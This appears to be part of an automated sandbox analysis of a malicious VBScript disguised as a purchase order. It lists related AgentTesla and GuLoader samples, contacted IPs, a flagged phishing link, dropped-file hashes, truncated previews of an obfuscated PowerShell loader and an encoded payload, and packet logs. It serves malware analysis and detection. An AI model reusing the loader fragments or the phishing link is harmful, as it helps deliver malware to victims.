                                                                                https://url.avanan.click/v2/___https:/novafr-my.sharepoint.com/:b:/g/personal/mfranco_nova-fr_org/EZPaIwPkDApNno6rWIAO20YB4ByiRCAe_VGScx-2iiONBw?e=magUuY/___.YXAzOmVuLW1kYTphOm86ZDA4MDI5MGVhZTA1MzJiMWZlYTg0YjE1OWE2NmVhNjc6NjplYTNkOjc2NzNkYWE0NTMzNWVhMjkxM2VjMGU1NGMyNDY3ZjVhNmJhNjU0MTk1ZmRjMzUzM2QxODAyNDVjY2E1Y2M1ODY6aDpUGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.2.184
                                                                                ADVANTAGECOMUSSwift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 66.29.159.53
                                                                                m2 Cotizaci#U00f3n-1634.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 66.29.135.159
                                                                                Receipt_681002.exeGet hashmaliciousAgentTesla, AsyncRAT, PureLog StealerBrowse
                                                                                • 66.29.151.236
                                                                                e-dekont_swift-details.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 66.29.159.53
                                                                                Receipt_7814002.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 66.29.151.236
                                                                                IMG_210112052.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 66.29.151.236
                                                                                Receipt_032114005.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 66.29.151.236
                                                                                SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                • 66.29.149.46
                                                                                zHsIxYcmJV.msiGet hashmaliciousUnknownBrowse
                                                                                • 66.29.152.245
                                                                                DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                • 66.29.149.46

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0ee-dekont_swift-details.vbsGet hashmaliciousUnknownBrowse
                                                                                • 142.250.64.97
                                                                                • 104.26.13.205
                                                                                • 142.250.81.238
                                                                                TRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 142.250.64.97
                                                                                • 104.26.13.205
                                                                                • 142.250.81.238
                                                                                Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 142.250.64.97
                                                                                • 104.26.13.205
                                                                                • 142.250.81.238
                                                                                shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 142.250.64.97
                                                                                • 104.26.13.205
                                                                                • 142.250.81.238
                                                                                copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 142.250.64.97
                                                                                • 104.26.13.205
                                                                                • 142.250.81.238
                                                                                Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 142.250.64.97
                                                                                • 104.26.13.205
                                                                                • 142.250.81.238
                                                                                72625413524.vbsGet hashmaliciousXWormBrowse
                                                                                • 142.250.64.97
                                                                                • 104.26.13.205
                                                                                • 142.250.81.238
                                                                                Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                • 142.250.64.97
                                                                                • 104.26.13.205
                                                                                • 142.250.81.238
                                                                                Shipping Document_PDF.vbsGet hashmaliciousUnknownBrowse
                                                                                • 142.250.64.97
                                                                                • 104.26.13.205
                                                                                • 142.250.81.238
                                                                                BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                • 142.250.64.97
                                                                                • 104.26.13.205
                                                                                • 142.250.81.238
                                                                                37f463bf4616ecd445d4a1937da06e19TRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 142.250.64.97
                                                                                • 142.250.81.238
                                                                                Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 142.250.64.97
                                                                                • 142.250.81.238
                                                                                shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 142.250.64.97
                                                                                • 142.250.81.238
                                                                                copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 142.250.64.97
                                                                                • 142.250.81.238
                                                                                Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 142.250.64.97
                                                                                • 142.250.81.238
                                                                                72625413524.vbsGet hashmaliciousXWormBrowse
                                                                                • 142.250.64.97
                                                                                • 142.250.81.238
                                                                                Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                • 142.250.64.97
                                                                                • 142.250.81.238
                                                                                232_786.msiGet hashmaliciousUnknownBrowse
                                                                                • 142.250.64.97
                                                                                • 142.250.81.238
                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                • 142.250.64.97
                                                                                • 142.250.81.238
                                                                                file.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                • 142.250.64.97
                                                                                • 142.250.81.238

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):11608
                                                                                Entropy (8bit):4.886255615007755
                                                                                Encrypted:false
                                                                                SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                                MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                                SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                                SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                                SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):1.1940658735648508
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                                                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                                                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                                                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                                                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:@...e................................................@..........

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3v2nqks.jdl.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i555qyuf.ryg.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzvp1f3x.oho.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofqqn2e0.umv.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Roaming\Myxogaster.Opv

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):432560
                                                                                Entropy (8bit):5.963120970965699
                                                                                Encrypted:false
                                                                                SSDEEP:12288:vYWT7LhifaaBthZbcs46fN3wFqFXR60vNjszF:t7YNxNjo2Xt1joF
                                                                                MD5:8C6D47E525B3831BB24E68A04B767D1F
                                                                                SHA1:62A53BDB00BBC042FCC91DB99C354EF78A759339
                                                                                SHA-256:5AFA3B03DF76600B65651B6F13225A81DA7B2FB788E1D596FA0880C31DB653C9
                                                                                SHA-512:7AE42F83D126DAFA41D5CA391B69FF8DB70C5B08FA9C1F0C6528E0CFEE677B17E9AB58E118B4059D1770FBB4E89DCED73379C0C16579EC8AA8CC1B56B541AFEA
                                                                                Malicious:false
                                                                                Preview:6wLNvOsCfVS7bU8bAOsCJNNxAZsDXCQE6wKepHEBm7lYcmQC6wLCeHEBm4Hxw0w3NOsC1wJxAZuB8Zs+UzZxAZtxAZvrAn8m6wKFULqRmCs/6wJfSesCv63rAorgcQGbMcpxAZvrAjfqiRQLcQGbcQGb0eJxAZtxAZuDwQTrAu6i6wJuSIH5U8NEBHzM6wJDpXEBm4tEJARxAZtxAZuJw+sCwFPrAib5gcNQmE0D6wLyDXEBm7rkqATc6wKQPnEBm4HytIhZWusC2YtxAZuBwrDfonlxAZtxAZtxAZvrAvNTcQGbcQGbiwwQcQGbcQGbiQwTcQGbcQGbQusCTF7rAt8JgfqchQQAdddxAZvrAo8fiVwkDOsCdVlxAZuB7QADAADrAueE6wLmzItUJAjrAo/9cQGbi3wkBHEBm+sCwg2J6+sCHtfrAtEWgcOcAAAAcQGb6wKmh1PrAnt86wJ6XWpA6wLLXesCVHOJ63EBm3EBm8eDAAEAAAAgYwTrAnVl6wL0JIHDAAEAAHEBm3EBm1NxAZvrAsUUievrAtCe6wLGtIm7BAEAAOsCrjzrAtT8gcMEAQAAcQGbcQGbU3EBm3EBm2r/6wLFNnEBm4PCBXEBm+sC+Usx9nEBm3EBmzHJcQGb6wJEKYsa6wIcJnEBm0HrAiICcQGbORwKdfNxAZtxAZtG6wL5besCaFOAfAr7uHXdcQGb6wKvVItECvzrAuiqcQGbKfDrAkgu6wJPT//ScQGb6wKJx7qchQQAcQGbcQGbMcBxAZvrAhUVi3wkDHEBm+sC4y6BNAeegEqrcQGbcQGbg8AEcQGb6wIWwznQdeXrAsldcQGbiftxAZvrAmCS/9dxAZvrAhBhGlrDThc1SFRhf/Snwx7bKmi5yAEjAbzlwUQSKnD7N1vqqb4gK4K1VGHVw074uYESJJ+BbBpny1rhaX7iGmTLQh3FUyIffhluPvbLWsQxrK5oR3mTaQS3bNqNSu3WrvMq6o1K

                                                                                Static File Info

                                                                                General

                                                                                File type:ASCII text, with very long lines (360), with CRLF line terminators
                                                                                Entropy (8bit):5.35477651961439
                                                                                TrID:
                                                                                • Visual Basic Script (13500/0) 100.00%
                                                                                File name:Texas_Tool_Purchase_Order#T18834-1.vbs
                                                                                File size:8'382 bytes
                                                                                MD5:85bb05a80334099ded83e21dd686c567
                                                                                SHA1:308f10b6208abf4a9c92736c80b6dcb01ca332d2
                                                                                SHA256:46d29ed35c7ca72d44d99f3d12603cd11435b6388bf61cd9988e7d375ddbb7b5
                                                                                SHA512:b70ebc02b5bd572762514c6fc51c667a60f2430ddf0715f6424286f15402c5deea08a45c5df6ca1deee391d13c71da115cdc30907e63b8caee6913de151031a7
                                                                                SSDEEP:192:jhNB4p8EjRXbRKclRi7uhzT9hNEIjgXmHpApCmJGPD86UfxbiX6j6OD1p:jmp8WRXbRKci7ux9wIjixpCKGb86U5bV
                                                                                TLSH:0302197B4137089E1B64099E399F0878CB00CC2C92AA9DB167EAB39DE149C05757DB7D
                                                                                File Content Preview:.. ..Function Skipper ......D9 = D9 & "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$

                                                                                File Icon

                                                                                Icon Hash:68d69b8f86ab9a86

                                                                                Network Behavior

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 23, 2024 08:04:55.253859997 CEST49705443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:04:55.253937006 CEST44349705142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:04:55.254051924 CEST49705443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:04:55.261887074 CEST49705443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:04:55.261918068 CEST44349705142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:04:55.458458900 CEST44349705142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:04:55.458549976 CEST49705443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:04:55.459494114 CEST44349705142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:04:55.459558010 CEST49705443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:04:55.462821960 CEST49705443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:04:55.462833881 CEST44349705142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:04:55.463181019 CEST44349705142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:04:55.475755930 CEST49705443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:04:55.520112991 CEST44349705142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:04:55.660217047 CEST44349705142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:04:55.660370111 CEST44349705142.250.81.238192.168.2.5
                                                                                Apr 23, 2024 08:04:55.660423040 CEST49705443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:04:55.663165092 CEST49705443192.168.2.5142.250.81.238
                                                                                Apr 23, 2024 08:04:55.753503084 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:55.753541946 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:55.753627062 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:55.754069090 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:55.754084110 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:55.950712919 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:55.950879097 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.041867018 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.041906118 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.042259932 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.043255091 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.088109970 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.416152954 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.416315079 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.421798944 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.421890020 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.434293032 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.434354067 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.440633059 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.484932899 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.484942913 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.507497072 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.507631063 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.507644892 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.510704994 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.510762930 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.510770082 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.516218901 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.516273022 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.516278028 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.522053003 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.522108078 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.522111893 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.529561043 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.529619932 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.529623985 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.534496069 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.534552097 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.534555912 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.540771008 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.540838003 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.540842056 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.548515081 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.548573971 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.548578978 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.554649115 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.554708958 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.554713964 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.562035084 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.562139034 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.562145948 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.567199945 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.567256927 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.567265987 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.609972000 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.609977961 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.657006025 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688086987 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688142061 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688186884 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688214064 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688237906 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688263893 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688286066 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688287020 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688296080 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688333035 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688338041 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688376904 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688400030 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688410997 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688416004 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688457012 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688457966 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688466072 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688499928 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688503981 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688528061 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688565969 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688566923 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688575029 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688608885 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688611984 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688641071 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688664913 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688673019 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688677073 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688714981 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688719034 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688723087 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688771009 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688776016 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688780069 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688816071 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688828945 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688833952 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688859940 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688884020 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688889980 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688893080 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688922882 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688936949 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688960075 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.688976049 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.688980103 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689006090 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689026117 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.689029932 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689054966 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689079046 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689089060 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.689093113 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689110994 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.689122915 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689146996 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689157963 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.689162016 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689196110 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.689199924 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689224958 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689248085 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689258099 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.689261913 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.689301014 CEST49706443192.168.2.5142.250.64.97
                                                                                Apr 23, 2024 08:04:56.689304113 CEST44349706142.250.64.97192.168.2.5
                                                                                Apr 23, 2024 08:04:56.690119028 CEST44349706142.250.64.97192.168.2.5
